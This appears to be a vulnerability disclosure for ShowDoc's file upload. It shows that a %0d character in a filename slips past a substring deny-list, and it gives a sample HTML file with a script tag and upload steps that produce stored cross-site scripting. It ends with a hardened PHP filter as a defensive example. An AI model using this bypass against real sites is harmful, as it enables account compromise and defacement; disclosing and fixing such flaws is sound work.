There is a filter that prevents uploading files with php, HTML and svg extensions, in the code snippet from line 115 to line 122 of AttachmentController.class.php:
if (strstr(strip_tags(strtolower($uploadFile['name'])), ".php")
    || strstr(strip_tags(strtolower($uploadFile['name'])), ".htm")
    || strstr(strip_tags(strtolower($uploadFile['name'])), ".svg")
) {
    // Error message reads "This file type is not supported"
    $this->sendError(10100, '不支持此文件类型');
    return false;
}
However, I found a way to bypass this filter by uploading arbitrary files with those file types, using a %0d character in the filename.
Create a malicious HTML file and name it phish.h%0dtml:
<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8"/>
<meta name="viewport" content="width=device-width, initial-scale=1"/>
<title>Test Upload File</title>
</head>
<body>
<h1>Test upload</h1>
<script>alert(1)</script>
</body>
</html>
Now, after logging in, click the arrow in the top right corner and go to File Library (https://www.showdoc.com.cn/attachment/index).
In the File Library page, click the Upload button and choose phish.h%0dtml.
After the upload succeeds, click the check button to open the file in a new tab.
You will see that the HTML file is rendered and its script executes; the same happens with the other filtered file types.
This vulnerability could be used to deface the site, compromise user accounts, and run malicious code in web pages, which can lead to a compromise of the user's device.
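To show why the substring deny-list quoted at the top misses a name containing a raw carriage return (what %0d becomes after URL decoding) and how a defender would harden it, here is an added example; it is not ShowDoc's code, and the sample filenames and allow-list are constructed for illustration.

```php
<?php
// Added example, not ShowDoc's code. Compares the page's weak deny-list
// check with a hardened version on constructed sample filenames.

// The original check: substring match on the raw, lower-cased name.
function weakFilterRejects(string $name): bool {
    $lower = strip_tags(strtolower($name));
    return strstr($lower, ".php") !== false
        || strstr($lower, ".htm") !== false
        || strstr($lower, ".svg") !== false;
}

// Hardened check: normalise first, then allow-list the extension.
// 1. Drop ASCII control characters (CR, LF, NUL, ...) so "h\rtml" reads "html".
// 2. Take only the final extension via pathinfo().
// 3. Accept only extensions on an explicit allow-list (constructed here).
function hardenedFilterRejects(string $name): bool {
    $clean = preg_replace('/[\x00-\x1F\x7F]/', '', $name);
    $ext = strtolower(pathinfo($clean, PATHINFO_EXTENSION));
    $allowed = ['png', 'jpg', 'jpeg', 'gif', 'pdf', 'txt', 'zip'];
    return $ext === '' || !in_array($ext, $allowed, true);
}

// Constructed samples; "\r" is what %0d decodes to in the upload request.
$samples = [
    "phish.html",
    "phish.h\rtml",   // the bypass described in the report
    "report.pdf",
];
foreach ($samples as $s) {
    printf("%-14s weak:%s hardened:%s\n",
        str_replace("\r", "%0d", $s),
        weakFilterRejects($s) ? 'reject' : 'ACCEPT',
        hardenedFilterRejects($s) ? 'reject' : 'ACCEPT');
}
```

The weak check accepts phish.h%0dtml while the hardened one rejects it; serving uploads from a separate origin with a fixed Content-Type would further limit the impact of any file that slips through.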